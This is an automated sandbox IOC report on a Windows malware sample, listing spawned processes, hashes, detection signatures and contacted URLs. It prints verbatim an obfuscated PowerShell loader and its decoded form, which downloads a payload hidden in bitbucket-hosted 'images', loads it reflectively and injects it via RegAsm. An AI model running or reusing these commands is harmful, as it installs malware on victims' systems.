Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\nTHivMbGpg.exe

"C:\Users\user\Desktop\nTHivMbGpg.exe"

Details

Is windows:	false
Is dropped:	false
PID:	1664
Target ID:	0
Parent PID:	4056
Name:	nTHivMbGpg.exe
Path:	C:\Users\user\Desktop\nTHivMbGpg.exe
Commandline:	"C:\Users\user\Desktop\nTHivMbGpg.exe"
Size:	192512
MD5:	8D797E4C1866E6542705A564B7FDA527
Time:	13:02:37
Date:	02/10/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6fd210000
Modulesize:	196608
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Binary contains a suspicious time stamp	Data Obfuscation	Timestomp
PE file contains executable resources (Code or Archives)	System Summary
Sample file is different than original file name gathered from version info	System Summary
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
PE file has an executable .text section and no other executable section	System Summary
Sample is known by Antivirus	System Summary
Spawns processes	System Summary	Process Injection
PE file contains a valid data directory to section mapping	System Summary
Binary contains paths to debug symbols	Compliance, System Summary
PE file contains a debug data directory	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a mix of data directories often seen in goodware	System Summary
PE file has a high image base, often used for DLLs	System Summary

C:\Windows\System32\cmd.exe

cmd /c 124.bat

Details

Is windows:	true
Is dropped:	false
PID:	7120
Target ID:	1
Parent PID:	1664
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	cmd /c 124.bat
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	13:02:37
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff627de0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Executes batch files	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

Details

Is windows:	true
Is dropped:	false
PID:	3724
Target ID:	4
Parent PID:	7120
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#ZwBm#GQ#LwB3#Gc#Z#Bz#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	13:02:38
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff741d30000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Found suspicious powershell code related to unpacking or dynamic code loading	Data Obfuscation	Software Packing
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"

Details

Is windows:	true
Is dropped:	false
PID:	2412
Target ID:	5
Parent PID:	3724
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	13:02:40
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff741d30000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Yara detected Powershell download and execute	HIPS / PFW / Operating System Protection Evasion
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Found suspicious powershell code related to unpacking or dynamic code loading	Data Obfuscation	Software Packing
Sigma detected: Base64 Encoded PowerShell Command Detected	System Summary
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7104
Target ID:	2
Parent PID:	7120
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	13:02:37
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff75da10000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"

Details

Is windows:	true
Is dropped:	false
PID:	7244
Target ID:	12
Parent PID:	4056
Name:	rundll32.exe
Class:	rundll32
Path:	C:\Windows\System32\rundll32.exe
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
Size:	71680
MD5:	EF3179D498793BF4234F708D3BE28633
Time:	13:02:46
Date:	02/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7604d0000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Sigma detected: Use Short Name Path in Command Line	System Summary
Runs a DLL by calling functions	System Summary	Rundll32
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723

185.166.143.50

https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721

185.166.143.50

https://bitbucket.org

unknown

http://crl.microsoft

unknown

https://admin.atlassian.com

unknown

https://contoso.com/License

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/

unknown

https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds

unknown

https://api.bitbucket.org

unknown

https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpac

unknown

https://preferences.atlassian.com

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack

unknown

https://www.atlassian.com/try/cloud/signup?bundle=bitbucket

unknown

https://remote-app-switcher.prod-east.frontend.public.atl-paas.net

unknown

https://bitbucket.status.atlassian.com/

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve

unknown

https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpacp

unknown

https://oneget.orgX

unknown

https://id.atlassian.com/profile/rest/profile"

unknown

https://aui-cdn.atlassian.com/

unknown

https://bitbucket.org/gateway/api/emoji/

unknown

https://bqlf8qjztdtr.statuspage.io

unknown

